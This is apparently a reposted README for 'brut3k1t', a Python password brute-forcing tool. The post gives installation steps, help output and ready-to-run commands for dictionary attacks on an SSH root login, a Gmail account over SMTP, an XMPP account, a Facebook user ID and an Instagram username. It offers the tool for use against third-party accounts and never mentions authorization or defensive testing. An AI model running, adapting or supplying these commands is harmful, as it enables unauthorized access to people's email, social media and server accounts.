side brute

Posted by barello at 2020-04-15

Server-side brute-force module. Brute-force (dictionary attack, jk) attack that supports multiple protocols and services.

## 1. Introduction

brut3k1t is a server-side bruteforce module that supports dictionary attacks for several protocols. The protocols that are currently complete and supported are:

* ssh
* ftp
* smtp
* XMPP
* instagram
* facebook

There will be future implementations of different protocols and services (including Twitter, Facebook, Instagram).

## 2. Installation

Installation is simple. brut3k1t requires several dependencies, although they will be installed by the program if you do not have them.

* argparse - utilized for parsing command line arguments
* paramiko - utilized for working with SSH connections and authentication
* ftplib - utilized for working with FTP connections and authentication
* smtplib - utilized for working with SMTP (email) connections and authentication
* fbchat - utilized for connecting with Facebook
* selenium - utilized for web scraping, which is used with Instagram (and later Twitter)
* xmppy - utilized for XMPP connections
* ...and more in the future!

Downloading is simple. Simply git clone the repository:

git clone https://github.com/ex0dus-0x/brut3k1t

Change to directory:

cd /path/to/brut3k1t

## 3. Usage

Utilizing brut3k1t is a little more complicated than just running a Python file. Typing python brut3k1t -h shows the help menu:

python brut3k1t -h

    usage: brut3k1t.py [-h] [-s SERVICE] [-u USERNAME] [-w PASSWORD] [-a ADDRESS]
                       [-p PORT] [-d DELAY]

    Server-side bruteforce module written in Python

    optional arguments:
      -h, --help            show this help message and exit
      -a ADDRESS, --address ADDRESS
                            Provide host address for specified service. Required
                            for certain protocols
      -p PORT, --port PORT  Provide port for host address for specified service.
                            If not specified, will be automatically set
      -d DELAY, --delay DELAY
                            Provide the number of seconds the program delays as
                            each password is tried

    required arguments:
      -s SERVICE, --service SERVICE
                            Provide a service being attacked. Several protocols
                            and services are supported
      -u USERNAME, --username USERNAME
                            Provide a valid username for service/protocol being
                            executed
      -w PASSWORD, --wordlist PASSWORD
                            Provide a wordlist or directory to a wordlist

Examples of usage:

Cracking SSH server running on 192.168.1.3 using root and wordlist.txt as a wordlist.

python brut3k1t.py -s ssh -a 192.168.1.3 -u root -w wordlist.txt

The program will automatically set the port to 22, but if it is different, specify it with the -p flag.

Cracking email [email protected] with wordlist.txt on port 25 with a 3 second delay. For email it is necessary to use the SMTP server's address. For example, Gmail = smtp.gmail.com. You can research this using Google.

python brut3k1t.py -s smtp -a smtp.gmail.com -u [email protected] -w wordlist.txt -p 25 -d 3

Cracking XMPP [email protected] with wordlist.txt on default port 5222. XMPP is similar to SMTP in that you will need to provide the address of the XMPP server, in this case creep.im.

python brut3k1t.py -s xmpp -a creep.im -u test -w wordlist.txt

Cracking Facebook is quite a challenge, since you will require the target user ID, not the username.

python brut3k1t.py -s facebook -u 1234567890 -w wordlist.txt

Cracking Instagram with username test with wordlist wordlist.txt and a 5 second delay.

python brut3k1t.py -s instagram -u test -w wordlist.txt -d 5

## KEY NOTES TO REMEMBER

If you do not supply the port -p flag, the default port for that service will be used. You do not need to provide it for Facebook and Instagram, since they are um... web-based. :)
